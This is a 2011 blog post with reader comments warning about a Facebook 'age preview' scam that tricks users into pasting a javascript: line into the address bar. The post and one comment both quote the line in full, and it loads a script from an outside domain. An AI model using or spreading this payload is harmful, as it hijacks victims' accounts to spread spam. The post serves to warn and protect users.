See What You’ll Look in Future – Facebook Scam!

Facebook has been plagued by spam! Keith spoke about “Bad News for AdSense users” spam which targets webmasters just yesterday, and we have a new “See what you’ll look in the future” spam plaguing Facebook today. The new spam is virally spreading across Facebook by automatically sharing itself to your friends and family without your consent.

You might come across the spam as a picture of an old man with a link “See what you’ll look in the future!” from your friends on Facebook. Something like this:

Facebook Age Spam 2

Have you noticed the number of people who have shared it on their walls? That’s how the spam spreads.

When you click on the link, it will redirect you to their Facebook Fan page with an iframe on it. Yes, Facebook now encourages iframe to design fan page, which allows you to add any malicious or non-malicious code into your fan page, which is hosted on remote servers.

To innocent users, it looks like regular fanpage with a “Show Me” button. When you click on this button, the fan page will ask you to click CTRL + C, ALT+D, Ctrl+V and Enter key. In reality pressing CTRL+C will copy a piece of code to your clipboard, when you press ALT+D, your address bar will be highlighted, and finally when you press CTRL+V that code will get pasted into your address bar and Enter Key will execute that script.

Facebook Age Spam

The script will then advertise itself to all your friends and family with your consent. Please be careful, and do not fall for it. This is the code which the fan page will ask you to page in your address bar:

{code codetype=php}javascript:(a=(b=document).createElement(‘script’)).src=’//charge1.in/js.php’,b.body.appendChild(a);void(0){/code}

as you can see, it appends code from another domain charge1.in.

This post was published by on April 26, 2011

About the Author: Thilak Rao works as a Social Media Expert. He is one of the first professional bloggers from India, and he loves to write, travel and click photos. Follow him on Twitter @thilak

  • Walter W. Krijthe

    I immediately got suspicious when I saw the CTRL-C message – Then the subsequent ALT-D CTRL-V made me even more suspicious.

    I did do these three steps to figure out what exactly was copied to the address bar. I did NOT press ENTER. But this was the only way I could read the text:

    javascript:(a=(b=document).createElement(‘script’)).src=’//charge1.in/js.php’,b.body.appendChild(a);void(0)

    Well, excuse me, but I’m not starting a script this way. I’ll use this page to alert my friends on Facebook.

  • http://tech-buzz.net Thilak Rao

    It’s very surprising that Facebook hasn’t taken the malicious fan page
    down, even though it’s spreading so rapidly! Thanks for sharing it with
    your friends

  • Anonymous

    It’s a real scam!!!!!

  • Marie

    What do you once you’ve done this? How do I undo it?

  • http://tech-buzz.net Thilak Rao

    Unlike that page. Alert all your friends. The script actually does
    nothing more than spread itself. Copy please spread the message across
    to all your friends not to do what the scammy fanpage says.

  • http://tech-buzz.net Thilak Rao

    Well, the script just tries to advertise itself. Please clear your
    browser cache and change your Facebook password. Better be safe than sorry!

  • AB

    Thanks, Rao. Changed my password…how do I “clear my cache?”

  • http://tech-buzz.net Thilak Rao

    Which browser are you using?

  • ST

    After I’ve cleared my google chrome cache, is it gone? Or do I have to do more?

  • http://tech-buzz.net Thilak Rao

    Change your Facebook Password, just in case. Better be safe than sorry!

    If you are using the same password for the email address which you use
    (i.e the email which you used to sign up for Facebook), change that as well

  • Hermitish Tendency

    So if we were unfortunate to have fallen for this link as I have, how can we get rid of it? I have sent a email to the facebook staff to report it and I’m currently scanning through all my friends pages to get rid of the ad. Other than changing my password and alerting my friends, what else can I do to get rid of it? Has there been any other negative side effects?

  • http://www.facebook.com/profile.php?id=100001280026863 Kornelija Bajoraityte

    well why wudnt it want to spread itself ??

  • http://tech-buzz.net Thilak Rao

    Usually the motive behind scams like these are to make money, and may not be
    to steal user data.

  • http://tech-buzz.net Thilak Rao

    Like I said, it spreads itself to somehow get more users to fill-in surveys.
    Because once you do whatever it asks you to do, it won’t show you what’s
    promised, you’ll know it’s a scam, and you won’t share it.